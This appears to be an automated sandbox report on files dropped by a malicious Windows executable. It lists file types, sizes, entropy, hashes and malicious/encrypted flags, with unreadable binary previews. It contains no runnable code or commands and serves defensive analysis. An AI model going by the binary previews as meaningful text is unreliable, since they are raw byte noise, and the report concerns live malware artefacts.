              Preview:... .r'....ZZ.J.jQ.+.,u.u...b.....L........L/.L.e.....Z........n......wt...y.../;...M..U...T.E.|x;.<.*.s5<....@([...nD.h..1z......m..Wh..L*.@[U.........JJ.....L'%.bR.N.f..x..U..b#.R8..i.........!?.....[..5.Bk.-.kA.|.)D...n..Yc..^..._.... .....x.F.S.[C^$F.......4........U.V.Q..ME...A.......3T..@M.=..#..X-c..=k[..!.h...|.~........gm....B......>..,`...n../.*..4.Tn.)[.e..W....P..=........zw....O.W.f.v...A..w..y.,..A.v.L...V........k.....*.jJ...a..~$h...{Ev8...../.../&Df..V#.Lea.hc3.....I.....~I..E.U.#{....zK..2..VQ...[...\..4...&..S.3.6.....l4.m.4\.-...$A..^[..t|.g.O.X).p..^r..&.Rt..!Z.J..S.^...p.|..^..."../T~..=l{m..g..<q.).k..(..._.2...X.?..a]..Q.q.1G...g.....\....Z.........C..B.9....E.)...|.....B7.x.|.XRf....B....Y.Q...aB....i.%..GM...Sj(..;.._..BH......<".;0.;.TFz...x..gh*..c..?I..C...<......C.3...?...0.q..Z.y..'"".:...8.g..T.Q.zN..@.R.....J...+.s...%.....uTjdj...!@.....Zq&k.,@..?.H...:....2...Q..<....Br.2.n.[...*b....2^.u.....Q....&..Tv.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.99365926689672
              Encrypted:true
              SSDEEP:768:I/WPrkByoZ7Grtbrer50eWY1eLzY71gDJj+pUnpL1MhogP:I/Ork0+7GJfurv/71gdj9p+Z
              MD5:E57B89F283751F651C0DEF09F232A8CE
              SHA1:DEC3937C3F602BD947C26605A572A487E97686D9
              SHA-256:EB66C8CFEB84D433DF90C5DE70D51F20B93726B3D9BADD5CC9C0F7632B2A184D
              SHA-512:51BBD213FB86BF0138478C35DA1C92635B633B933D826A2553039E12784F5F7BA4A89A2C7B1BED2C2F7E73162010194DB8FDFDE34980B68F2A00AC60BCDFD34D
              Malicious:true
              Preview:..-..I..y.qBJ.&....>..R...[.r.ABn@..`..IXp..6..9.....e1...7FT..F.....d[e.D..(....jn'.b..h(x.Q....Q.<,.V...Il..:.-.#.M..S-.8.1..x.7.....v.sXI..S+]*...x~....\R^.*.8a.p.<....&s&..Je.........#....o7.S.:..W............4>.4.../.m...e....Z...PM..^z..0..SO....X..R..+b...'.%._;S'.`(.i2(...^.V....W.T!.VG~.....8.....6.Y..(...._C....[....V.&...Z.X7.,..u..W...!.|.p[.QVo..w....."|.]....M.......5>..}}..S..._.e.Q.Q].E...i..Ve...V.JN.."e"...~1Z.jH....c.g.....-.....S.FJ......C0.4....W.B....D.....ry...P....d.h.z.\.%...TYz........a.(V.7O.Q.@...=h.7T...MH|S*ts.&h................9....g..q.+.7.@..".Q".oH....g....^....`..oT.X..n...O.......+u.g;.!..(.!Xi....L....:6...SL.n<q..iWs4....2........\`..kW..g......>......[.jM.?NJ.,.y.uY..<.o[..F.2. ].7*...u._H.r..sL....W.mmpp>.d7......v.....M...B .CJ.....Y]...2..,...........L....~...gJ...J.....7.h.1(.a%.&....h.#.Q~...@.A...Y..]L...'g..fi!......le...cp.9...:.=.......i..........+w..D0...R..r5j.a...Q..Nxn*.|7.n?.a...R..}..1.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1048910
              Entropy (8bit):2.668787232794656
              Encrypted:false
              SSDEEP:6144:RTPIBcgkLdWu8QWjlL8AfK73/H0WUL/dfxuv6C8U:RIBgdW/5e7PUWc7O8U
              MD5:3A731DF01E11AE0BED88393E4E1EC5D1
              SHA1:B8AAFCFD5750746944C449C64D566CA7BF6C9CCA
              SHA-256:B3487A151E2BCEA6B3D356ED0A99ADB75E37D97054726ACE99147200BE062E2C
              SHA-512:58059035E9F7CED9B69930A33D3B00ADB64BFEE0370443A2BDD8C2B02F27E15051E096972C4B98E2DE5BD6F92AE331B133C5D8DBAEABBDA7D57E6C599B0CFA91
              Malicious:false
              Preview:SQLit.o.zh...'..ks,.a.d...[........`..?...e!+z...7~.6aN'.%.8..4+..!..3J.6...V(..l..J...*.aC..........w?7>..\._..g*].J....!V..=..Gat...5.}......Q..VK=!gl.|#....Q.....2..P....p.<b....S...+.....Bb.'...T.vsq.$.Q..j.......!.ps%Y2BJO.O.W.]......D7..&......$.v.d.6T..kg...%...j....x%...x.x..S...k...iK........A.qV.F|v&..w1v...r .Fm.@..4.].......o..._.S.`.......h.(r....A1...1..{o.x.$...mjo.S....PY(.V.~x.PV...N*..!.O......z..($..'...AZ..R...bu...H..y.`.j.....jw..a.N<j.TW....?...}.N..`..../.0o...]e.N..\..e]..r..K..S..vw^.j....}x+}..o.x*...K.#..Y.!VCH......)I.t.....D.8..Xyt..F..<v.....x....C.Qf>y.sqI.7p..>J8.P\a.a..*R.G,l...fos;..m............x.......j....p..].7.h..'".pK.$.%..F..t.o..j.`.....z..`G.Aeo.w..K..3.......d.\.W....y..p.....1....D.:..|..F..<..#...3...[.X........:.*....;...od^......-...{e..t.4d_%|.=&......M.1.....$.9..^..j.5.a*y.W.Y./.9.....Ho.....v^...R...WD.......<.w...-...g.w..b.YG..+...H.. ..D..t...L....+5..Y..a;Kk...s.!SF8...)........5.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):25803
              Entropy (8bit):7.992498739036854
              Encrypted:true
              SSDEEP:384:cCHQf/D1pIc6t9KCDGi/4MwopK6b7quLTO6s1hyy45Hp+PZ4ZMc6kKQ7/kA:c+Qf/Ds9rgMTK6b7qgTK1nqHj16kx/T
              MD5:8E0C6A598685580385B376A96C34B122
              SHA1:26F9EA4C4075C6884A89C005378ADE549458065A
              SHA-256:0553ECE2E8AE3BC6BAA96203D4DF0B8C9A2A80F28EF4AD2CE0244FC16561E220
              SHA-512:ACEC5DA6CC1EA5ABC210EF3C1A778CF0D94D1B06BEDACC7F96C94D8121A8D7FFF14A460AA37C4576B23CAB91F33AAE3DC9EF8BE5A7DFA1880F4612FB7F98C4E4
              Malicious:true
              Preview:H...W.....X`.w.P...k....^.H>M.......H+....L8.F.L......v#&'...X.|vD.Uz.....Am.....C.3..u..-..0.!$.PZ..jw.yoU8T.=11v....R.c..P....Y...3...+.....Z:...Bz.&.....'.(?,>......;.Ck!m+ew.....C.P,...#tG$.Qu...N..6....C.b.2.|.=.F.L.....U,.Z.....?.>Y..z...$.)W.#^"X%W..........=......2...u..."....b..d..0...y........v..mQ*|.dH.!..?..^.S6E.EKC&.y."9L.E......g.E...Rt}....y.].'..x.......*:;h......S.......>.+..?...{L#...q..X...........<.^V..=...v..t.#o...T.M"=I.rN...J.7..+...]...u...c.LL...$.1..D.O.=.i.$.Y..uK.^.,.....m.ZMj.BDV1. w.)n0_...HRYe......r1.Bn.lQ.lH/..:.b.b93.1....D....e..........:.."g...\..N.1.i^..&/.p..~..C.<..]....+}Yv..`..s.).l?.d...A....Me.\.|.....O.7..[.....I...}...:..H..@.67e.|..bT.n.q.aU=X....d....<Gcmk...X[. Mq........{...f..........j../,..o1..$i.F}.8.)...]X...j..O. ..!.T.W..}.E..S.5..!PpN3...t~.......Q....U;D./.S.....S3........+...Ix.%.........0I.B..i.5...y...0..k.....5...F..v....SO..hC.z.....4.{..5.P.r.....>..#....b...U.u...R......n.P..|.X
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):582670
              Entropy (8bit):5.268259849509629
              Encrypted:false
              SSDEEP:6144:uKWA/+tFjXUkWnh8hVyZKfu/H/KT8pNbGNPLRdMlduU6/24JG:HWAUFjXUkjf6H/KAutubcJG
              MD5:069E333F2C729ED39442C0A5BC333E45
              SHA1:EE763DFBF23A7B54C862FD0D20CD47AB544293EB
              SHA-256:EBCD83D813ECA2319C6E43DBD95AB94790D3AE9EADF4FD53340EE7061B704F81
              SHA-512:E92E2E11C05015B0E93F92CE4D5062B3493A41836A063D547C3DDA5F0F85FD1323C603CE1F08C4FA25D130208EBA860003788F6374E2920776CB570147CC3FD5
              Malicious:false
              Preview:.......C.......(Ri.....x....... <n<z....#......he.J]..Q..x.]....E.....V.W....-o..!...d.E.'.f.u..%....g4..e......~...0&.#.r0.g.%.(.'.X...4.[.lF.6..X5UpQ........:..)V<.*.Y.j.N.N..t..q>..h..i.....N.j.M....[6..JII....1........i<"1^H9...............2....rVD.I......3y....<.. I..... ,.E.*...L\.b..Y.:.....cg.v.+.....t.MK8....~...}^..?.w..Zk~....Q....R.....tN{.[G..$.._e#..g....t.x...h.._rV@.Y:.....~..%..ru*P~..Q9oj..F.|6+V`]..fh.44nc......g.%F..<D.."....p...9.?0..6|..x'.I*...e..\..w-...[..-D....l}....O.U.b.#)(..........z_.....K3.Z....M..Jj...(..\}F.V.v._......:.F ....C...Q.4j...3.`.k.....1..`b_J....m.S.l.[.m..[..B...O.Z...R......{..~......H.-[.....Z....v.\rN.'.u...E."..+..L...h.o....U{5.3H.\...`$...xo..M.3...e..1 ...|\B......K].S..j.u....J...C.Iv..@.1.<.bt;O.9...y=.2...!...o....w.E.%....QM.9)I....AE'.....[.,m*..z=..Nm0#E .....CI..4....B.........mT.V.1.\y..Nu.G......vQ.n6...[.8..I.%5..#px@.....-H...^T.[Y..lCI7b....a.g..t.....T.i.....{k...k:K...#.Z'.9.)
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):6906
              Entropy (8bit):7.978241332540441
              Encrypted:false
              SSDEEP:192:AemQPHauRnyVRfLjrWfYevWqebhcDYJW8jFy:JTxyVR3rAYe3eODYJa
              MD5:5D79E26EF3142CEA476E38098D185E7E
              SHA1:9855909795245E433191421394935C6A025E634D
              SHA-256:D3FB69F6CC05C2262086340C7A974844B1B7DF7ADEB8027B84625D59E6D7AA8A
              SHA-512:A28A2B64528A49898AFC955FFABFA312C5CFAEB50870FA9FE3A31A5E017BD7D19D607834033EAC587A9726C02C32C6440CA2B769D585039A368D9C9B91B4E515
              Malicious:false
              Preview:10/03...I.m..%5....%,.*.i.y.L.rW...A....[.Ea!B(..iZ...:6.o>..(.%x7.~W{.Gq..v....W...e.\.T@..N.Q......y.X....v..[.Hp.+.v.u4.H.5v.....g......W.L...X...<].y...,....^......=.s*A....R....%.z.N..........X.o.P.@C...v.NO....P...F]....s...._.F7..,...T...)...F.+Qt.@.u.y.:>(.o..Kx.[.1.[..w.@`'h..'..!......P#......5X..1..pE....M"j.P$...[..H...m*..)K..7q..).0[.P.].eW.b.Q7e.`.m.xP%...>.7WN...!9.(..__...;.8..F.=xG.(.V.....tX...Z.!.4Bpn..w. ..5w..y...r.#].....I.$....@..o^7n..9......._...bD../.(..hD..|...G.L=.%...J......BF.$*..a.....vr..A.3...M.E..S..DC..:.$4..y._Y..yt....O...Oo.4...]Gc.#l.....+..?......m...d.b.].uE.i..3{.j...l@..xdk........{~.7.,FL.,s8.r.N.....E\........g..D......{t.Yb....6.Hc...cw..#{...D`.04l.+t....N....K..:n.Jh.J].9.....:A..jh.z...K=.'.......a.6gx.*..(.jf)..g.....d.cUG:..V...V%c.F.J....q.$fw.!.. .....kt......?...uj.HA..M+..R..S'...H..."*.....g..<.<..Q{.[mBTd...z/O..ds....(.X.t.....8].K%.R......>u#..)..s.=. N.h...MB.#..f.,.\.X.j.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
              Category:dropped
              Size (bytes):834
              Entropy (8bit):7.726228811701058
              Encrypted:false
              SSDEEP:24:QeVKRSLaN6h1XXU5ADeE39zMfD83UZUvBSjTbgPbD:x1Lache5A48k2+0TD
              MD5:214B0F42E7D97536BFD19ADDA7A4EE58
              SHA1:8620A978FB8F4AC19A642B51DADEFFE12082E907
              SHA-256:1595B7DA7D1B0BAEA929DD2AAAB96D9C2ED411DD305386431D4D9C4E743BDF3D
              SHA-512:6564B0BABBB4B6D7FB306D5AB84410F76BDE1EF7482E518CC9104FEEC7157FE12437BDB8A3A2915D621000E4714028FA9E8FF5CFDFD6AC0F0398500441B2D522
              Malicious:false
              Preview:..1.0....K......+5.....h3........*...Er...%q......5..h..Y..w0.?....q.=f{...QL.;.i.u..J.g.#j..Q.y...=.2.yZ..L..(6.{.;&.4Vf...>. w+.H......F.D$.e....m-..JGI..k@o..X38.KBu_C..HBe.. ).&.7.4..F..0.N..s....9N9....._.....8....X..H.?...2.I.....V..k..t.K..2l.9.h&4..6#...P.{.6t.y..q....1.[G...s).J O{...\.m;...F..~a...2........'+...R:8~..5.O.ku...L.m.b..T...#}i...=..r:'..!...*....2..;/D.....L3......6a...e3\g{#......8c.mWC.3..]W..k.n....(.w.M..h0.4...$..u-.fa.}.K...X..7}B..J...J.,l.G.^..L[p......iR.j.Y.g..d .....0G.B'b9.3..u.+.w.\.7......+...j.yZ..........R..(Ij..o....oY...........J...d5..e.{%LU.....Yq..........+).f.q.U1s.Sl..T].&.5nj......F.....e.!....%..........b$$i..4..Fu.W.....+4s\...$d.v.......".1.'......r.....gE..,N.O.[....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:Unicode text, UTF-16, little-endian text, with very long lines (869), with no line terminators
              Category:dropped
              Size (bytes):1740
              Entropy (8bit):7.886340708949196
              Encrypted:false
              SSDEEP:24:QXFW4CzteXAAcd9YUTc3FXayqtgzqKrQ+f7euXiWDbMCFUnfu3kEv0teYnlleL4X:YFW3WANcICOMeuywbMpfSieElleLiD
              MD5:6A740A72349432132E6BDB95B97F2601
              SHA1:9FBB0BD8860E642343EEB63B14F534F19A5B2689
              SHA-256:59FA03170A2E8251DCF48CEB740F73B7BC1055F8F296EC30EA5DB2FAFE154FD6
              SHA-512:F45727DD7D690F39968D5451B8E28D559752551E8AC7C58483E446B0709DCF10132A6751B5262033CED47FFDD52ECD53A7D02A5FD3DD112F161A56A5D7E99644
              Malicious:false
              Preview:..1.0X.17.B.-,+.Wg.....i$.?.J......D.|N{....@k^....{SP.Bn$s.W....Q..'..T...`.&..........u,O.........U/.u}k.N.~..........Be.6...a.r3J....o(4.. ...y}..u..YvF.c..>N....~Z}Je.ckb...a\"|...B!.or.3y..Uw..........=n.0........S{iX.....X..r/X./C..Q.P..$.~..)y.k..;.e.$......&U..u...(.-.?N......c....j..].....?....../.sT......9.V....f.7.'.|T...8.0..r.V.FB......f.4~z.Q.,&lB.y.\]......7.$:.~......E..b....3.n"...rr...)...k.P,.........*.. .v\..|..y..mXsBQ].-7Y^.pC\.3.q.'.k..3rwsK..?.z._<..O.....z{....! Z....\..h..G....<..........e>h;..*z..S..a.=..'.z7S)u...>G..).c..+.../.jC.....GMM....7.K...qR..nN.T.9>...P&c/yD..j.Eg*....M...5_.Mn.u..C.Y....V...jo...m9.<.....^..y!.$.......M.2G9.....Y.....C.5..iQM...q.V.....%.)......P...QKe.n..K.X.`..Z.....S..j...<.^^..@.r-.....A..9.....+Dsw/..."....m;/.t ...Lu..KE...s.@.......GEv..A..1<f.J.=..*v{A..D_F.4N..'.5.9...>'5i.<.....c..f.rKnK......"Ja......)..w'<......$E...[.5.L..!O...)h.'.j!...#!...GJ..6...[.$3.O-....../........
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1353
              Entropy (8bit):7.856645295910797
              Encrypted:false
              SSDEEP:24:Ymmfah0bvBXFeAe3LNCiWkrrr15zCf0dHy4vwIpiG63Fl5QRVrzagPCzbD:YmaahkvB1pmLDrr1Vw0dH/wFNCtQD
              MD5:7537CC087F1AB2B2716CC5FF68F1DEA7
              SHA1:E270C417088A21B77354102731482FBEC5786B4D
              SHA-256:C48F75E5BE1FC8D4C1504EB0AB0E01A839F6F1A294CA5FDE366ED0E9CB941FE7
              SHA-512:E038CA8F98F365794341431282F1F7D88E8C29A0F57485E875AC33DE4C56ABD1B09C3C796ED161650BA4FD8CE4F50F140612BD7057AEF21FFB473EE761BFDC74
              Malicious:false
              Preview:{"Rec_N&.+..H....T.\.VrM.P*...<..vik...w.H1I..)X.h...b*.._;..P....7.{b/v^......'.g35.e..^X..%[.,..x.v...L.xb............IC@9..f./...~2..Br!..ef......7|Bh/...u..@..o.>.i.d._5.LIhF1,......<.%h....z.."..E.......X.,c.e.,.^..|...:..^.#....3..y.E.A}..@h.s..W..f....S.Jh..I_....1.Qjz......4/......u..../..tm...}.!0.EN.ri..i.0g..`...V.......&...?.~.g.....h>.\.U\cJw..m..;|..KJ2vK....<H....k.....*...k....(...d.j<[.Z.O/..n.G......s..........tK.~~.+...P......=m...I...T...$K.G...M...9.G.......hJ/X..p.;..3f...j..Nd.R.L..1'.5P...S.........i.L....m....p.1.Bx......[..E..4P...D...Z...Tt`........&C...WO.}..(.d0(.w.K.!....^...1.........`...."..TQp..k........@..6;m.V..yG.7.:..v/.PI.....E..u....."yE]..GMJ..!....@..c.%xiCc.Q;f.x.A....{.>.(3.W....k.N.?.e........h.....(f.c....l.Y.....tXV.!......P...#..G8..`lpM;...5..K....TQ.=.....Q.sL.YP.......T@..^..v......).|.u....._.[..X.......^.........-...`H....... .=.Q..._.....?6.....1.n.U..s...GP..;.3xK%...U=.....d...8:.{gY.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):865614
              Entropy (8bit):4.099511949191101
              Encrypted:false
              SSDEEP:12288:NWk4V4R6bA5LG2ZZJC6JZ2yfZyWeI4VTZZZZJC6JZ2kZZZJC6JZ2zrZZJC6JZ2f:Y4RSh
              MD5:680171C5C83BD35977CB2ADC3B923246
              SHA1:EBC68DE7BFDA6A74F49D67609816E411E6DE314F
              SHA-256:615DC2136A2E1B96205FDB2F854F1275A355563B487CF1503B384BCE7A524060
              SHA-512:AD9941CBAAFF95C504DDDDD71D620CC63E1FDE5C5BE6F8AAC65EBB1B061FFA1A36678BA414D7A772906C2344A4044E2580F1D4474A8DF8221F5F09347BA333F3
              Malicious:false
              Preview:regfCR.....<M ...7.&.....".`V'..D.....bE...u....J(!.4.t..<(..Sl._...f(..b9S..bA.....?..N.y...p.>#....IE...h>...........0,.r....U...O...#1@.P..l..Jg.BN.U.<.H..U.b.......C.~...^.M%..0 H....tYc#x..&._.+..g...L.. BX....N..'...;..6..q..W#..%.n.t-g.0W..g<.a.........s.!.b...f.u.no.<.......>....f._.H...H.2...z3.tc.....*..=.7U.9^h.]....2B..7.C.4.w8.h..M...e..d&..).O&....8w}.7..G...r.Bl.-.7....A)..$...x>G..^.?....g.VML\....(......2.....b...u#l~..n.......l0...[.D.,$.*.....&Q..d.q(B...d......O.0....3.i..v.'t.....}..m.h.V.G....T..\.e..ogA~..2..u.Hw.$0......~s..%8.R.^:6..~U.\w..s.4FM=`PM-..Gl.....,DE.I.h....@..bf..i..<..q.......a.p)..8;L.....W..N..n..U.3D_.1..'7..n u.......q....@\H.GG.....gO..n...>U..$.....i..i..>.T8O3..<.ik.\B.I0.r^..U......8...%wl.......X.|C..;.$.-.9w%....7....#.Q.<..+X...P.\..W.U...x..x..../..@;.`i..6N=.b\eW.."..G...<C..\.l.^.c...........W%....zir......;8.I`x....X| .p..|...S.~.p...{.j&...._m.+~.K.k]]. ......>....e...M8....'y..eV..*
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):865614
              Entropy (8bit):4.814588395701057
              Encrypted:false
              SSDEEP:6144:fBd+3qb5RUaofBAlAjp4X5/26scpbJ6JZ2CM2C6JZ24:fz+3gRUlZAlAjp4pmUJ6JZ2CM2C6JZ24
              MD5:686A569D8DAB5A2E461A9736E140EB26
              SHA1:5ACAFCACF7E7AA4680B33CFF348ADAF10380D6B8
              SHA-256:247040C64EB449397F7463EEA00F8D5012FC889DA489B1371F61BFA4FB6C5EC8
              SHA-512:441E5B0A7DF2205BC073A414B4910A4F99806C70ACAE6EF5F02C19384C44FDF217615134AA0E8C2AD3A38B1397EC7E2F63DBC2FD8393065C6EF213D0FBC85CA0
              Malicious:false
              Preview:regf-..-.5..^...H..O'.Ki....3.p;...2...B.OD}D0(n.>.Nvj3.;.c.49..C..(.h.sof..[..f.........I...Yr..W.?K.....2N3|8.+..0.$.P..(.!..R].7......,...nw.......u..a...m<:..'Og.Pb..L..jR..q.[@.F..uD3..<.S}.....#....i.......b..].-ic.T'=...A.._..5X...bkf..U4.l...S..z....a=..`O.;...g..4.f.%M..P..p.;(..^{f~.P7G.t!!......~.......(..MS.]..6..l......1....5..c._N..2..E.O(A....G\[q....-y..],Z.....Cm...X..E...O.8U....ONXD.x...!....w]gX ..\f....S.f..Y.t..Z!A...z....c.zg$.K..~..h>um..i!`...y.)....V.......US..7L....R..t..+.!~..R....s.GXUV...r.7.).......?F.>).=..o}.h...B..t..cn..J!..[aT,3...N0.w..)b..B....4..;.^....6.X.V.RY. V.X.J....:Y...O1J..\.O...,....2..1...mh.n..*1.7..F..4.s......)f......)...g9k.....h,........(W....C...k..+&..Z...8H3..2p..."y.....F9.J....x...n6{m..7....I*>{~q....B4l..........fo8......m.M76..!o.sJj...E....F.&...M...v...:q.~a.d8.......oD<..$.1....../N".g..A}.....~.T......%.s..|..K.G...?../...Lk]l..v...&..>..o.A.(m`Y..N........Fo.....a..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):3408206
              Entropy (8bit):4.7634012625703015
              Encrypted:false
              SSDEEP:24576:8e3XUooy1ncWOOctVMiA8DqkXci5QStPi5Uvk:8e3XUooyCOctVMiA8DqkXci5QCy+k
              MD5:CBFEDAC6702E07A9933B7B59DCCE3848
              SHA1:C5685AAAA1E38E6ADF2DEA95C1C8BE14F231D68C
              SHA-256:AC5ACD096F5CE5E9F0C531B7F17EA205652CE5E5CE55B1A2AC4BBB7941F3BEE2
              SHA-512:E180B3B5A4D1EC6B4951D3302A576EF78FE07897CA289F88FF389B7C2F4AFA8117E8A38AD31FB20C82D81F3F8601F2172689682FF42C3CCEF883A11E465F8C93
              Malicious:false
              Preview:regfD2.Q..}/k8+.....c......G.J.S.Z$.@.".\gk.M$..-..Aw.kLM2.E..{'4.:o<)./...../...).k73.J].u..ZI.H.......E.....0.....[....H.uQ.....}7{@a.1..$..=...T..zc.KQ.S..H.4.;...a...<..].x..\.k#..eG.G.....q_.7R,.&[J%.T{...nGD.....}(..DN. ..eY.'u.N3...,...&..Vt ....fF.N.Tv.j...n.z.Ns...+...^q.??``..}.....'0uI....ji.....y(.#td......_[.....2...fe (P. ....@.iG..:y....|..C...PR.]s:.j....*...?MT..g....>_.b..m..lJ.*....h!'..$V9e.].q..Ope....H..1...i......d!5>....{.eyL...J...&..N....<....?..|8."...7a.........sM....++.....t...7Y...\m..{.W...z...+.)CG...7..i..M.....G..Dy....LE.?:.z...c...fl...Cfh.5K.....M..|.M3..W....>.KQ.....<..^.7j...|o.o.Sb.....n..<J./F.&..cH.....D......w't).....HN...'.@....J.m..Z..6.-;C}..+.Q5^..L.\.s../.M.U......h2.1.n..fb...Cc....{..m.*5...4L'.:-{.......iil._:e............'!..M........7s.mH.Z..M...=...K.).|.....CY'J...Bf..o.~.....}...8..k.....;...4..^.'.Q.*O.v..vL......8ehJ9.b@......b...s.....b...s7..9Ly..$2......aR.J.F.).ml.[.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):18241
              Entropy (8bit):7.990509606487273
              Encrypted:true
              SSDEEP:384:BcMSkQ18movsS9VCK7LNXIljt+3Cb4qYq3w52xTMolprjHAt33:BcMjQ1xIsQNXINR4qYaw5LoPrjg13
              MD5:B4222879F1B849782550191FB8F99007
              SHA1:459FEC0AEE91DD262F00EA932879E77EBC65AD7A
              SHA-256:55D2BE2EFA964FE47484231411A6D7972ED10B26BE3D4361904B8B482294976A
              SHA-512:36C0E55AC9444C3ADD0BD1E5D7F3C30D06C988967D57B17FA911F0853379EF99D40C5C27D17CA1A7D586AB7E0930F558BECCAC40A270E8C7DD1F9C2EDD25A241
              Malicious:true
              Preview:03-10C..lqu<.Eb....'.../@.7G....Z;.......P..Gp..S.L..RR.T.=..o%7K...<..Y.$...R..K..^ ....$.O.P...'$..."D..r....zZ3\uT.,{].,2.1..@]U04q...,D_.z.....Zle....2...;bu.... .[.%o..M....i..C.g.J..1.......k."A..k.,.6..z;...5i...........H.o.*..[.r.c...f.....dB..}O..._8H...]._..Y.O2...1..}..*...Z.[?>.....>.*.......M....6..1.....W .Y.....yXrn.d.....V......n....<.;k..s.........*....it@.U.....M..........x.[M.O.!y.g..]..`.d[..?]..].M..O.%......h.L<.,.s..+r..3..7WM..........h...4.F"..a.`..B.|....`..{E.....(.<...h.$"F&...........Z.........?5Y5..2.T/.<.....w........8....I"....DL..f..j......^'......w..=..R.............M.! ...a0...9.A..+.....4n.(..7.:..-....dTb1...f.{...8.....l.I..Q..}..Xz....;!..;s@.. T?..:.]...I....Hw....<{C}?V..k.&...0.../.P.y...IV#...MQ.|x<....S.SyW.kz.._..!..^."=p.....x..Q..Wk....v[......x..0.x>.2.L.~.K...&...B'......w..T`..._4@.f3..H.c...`..a.s..^.2-.._..8....."../...K....!iY.Ei..6......|V..... .je....;v.px. ...#..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):3408206
              Entropy (8bit):4.917314379662161
              Encrypted:false
              SSDEEP:49152:Pz2Q/SyDIUHUpElepQM4DpaNYRXVmpaNYdK:Pz2Q/S5E
              MD5:F1D3ABC070487ECCFDC474D536686579
              SHA1:19552F16DF6B821A466874538C6E4155E51B57AA
              SHA-256:15AD2F52D619AE436AA43B407AE7BCB9D32FEA1BD7EFDC4E46759C7EBA39A092
              SHA-512:39DDBA6391C4669D49F36D93EC36DDF439503F4AA4FFF5291FB76FA8FF337954A921FD3D0949ABE6D7A4C5604A2B689BDF3C3E3A25359A06292F62E1057C8F7C
              Malicious:false
              Preview:regf......U.-..y].mPP.;...M.?"..p.....]6Z...1.o..6[s.......m.).Frw.......K.....5..Sg.p......9...p..'.F:(.........`...dh..+...`.t.C..d....J .C7.h.t.L.. .%..T.y...Y$....yf..`........*.lm..e+.a.I...I........f.e.".(.N.C....($..HK.Z..LG....`"....b...D...IB=b..%.\...}.[T..f.C.3f..c...%.w....F...r.eLy..2:X..L...3y..)W.2.Ln...'3t9..1..q.....D.O.........Ey....yMp.$S.d.r...U.......F..;./.^C..Z.x.......We.0&...Q.[...;%G..7E6.q.5.o.o..^`..D...........m.....}....<|.N.@...K.....V"9.`!.*...D.x....E..Y\..v).k.....YY.p%0...&>.Wy...(..A.D&l.../T.s..%.Jr2p..Lz?p).|;..z.J....u...?{...2........J.j.\KPO...Ef.-..U..n4.|..0..l.3..O]LK..k....X../.[M.L..\.J.....1{Gf.t!.].)..v..:.E.........Z.#..?pj.....D...6.B...Y.../..51oO.{...|....N1.&B..GS.6y.B.K.9..@..J.9Oe^.....J.$....Pv/.S..........W...............@....Q..At92..7.P..Q..CE...kR0.$Y{\...K9...8g..-....9^....1ds]....F_c.bO...|..?..&...6...t.....#=.4..1]y.-..&......3{....2D<y...T...I.X..0.j..sq.4..Y()4......?..R.Y%
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):3408206
              Entropy (8bit):4.917314379662161
              Encrypted:false
              SSDEEP:49152:Pz2Q/SyDIUHUpElepQM4DpaNYRXVmpaNYdK:Pz2Q/S5E
              MD5:F1D3ABC070487ECCFDC474D536686579
              SHA1:19552F16DF6B821A466874538C6E4155E51B57AA
              SHA-256:15AD2F52D619AE436AA43B407AE7BCB9D32FEA1BD7EFDC4E46759C7EBA39A092
              SHA-512:39DDBA6391C4669D49F36D93EC36DDF439503F4AA4FFF5291FB76FA8FF337954A921FD3D0949ABE6D7A4C5604A2B689BDF3C3E3A25359A06292F62E1057C8F7C
              Malicious:false
              Preview:regf......U.-..y].mPP.;...M.?"..p.....]6Z...1.o..6[s.......m.).Frw.......K.....5..Sg.p......9...p..'.F:(.........`...dh..+...`.t.C..d....J .C7.h.t.L.. .%..T.y...Y$....yf..`........*.lm..e+.a.I...I........f.e.".(.N.C....($..HK.Z..LG....`"....b...D...IB=b..%.\...}.[T..f.C.3f..c...%.w....F...r.eLy..2:X..L...3y..)W.2.Ln...'3t9..1..q.....D.O.........Ey....yMp.$S.d.r...U.......F..;./.^C..Z.x.......We.0&...Q.[...;%G..7E6.q.5.o.o..^`..D...........m.....}....<|.N.@...K.....V"9.`!.*...D.x....E..Y\..v).k.....YY.p%0...&>.Wy...(..A.D&l.../T.s..%.Jr2p..Lz?p).|;..z.J....u...?{...2........J.j.\KPO...Ef.-..U..n4.|..0..l.3..O]LK..k....X../.[M.L..\.J.....1{Gf.t!.].)..v..:.E.........Z.#..?pj.....D...6.B...Y.../..51oO.{...|....N1.&B..GS.6y.B.K.9..@..J.9Oe^.....J.$....Pv/.S..........W...............@....Q..At92..7.P..Q..CE...kR0.$Y{\...K9...8g..-....9^....1ds]....F_c.bO...|..?..&...6...t.....#=.4..1]y.-..&......3{....2D<y...T...I.X..0.j..sq.4..Y()4......?..R.Y%
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1193
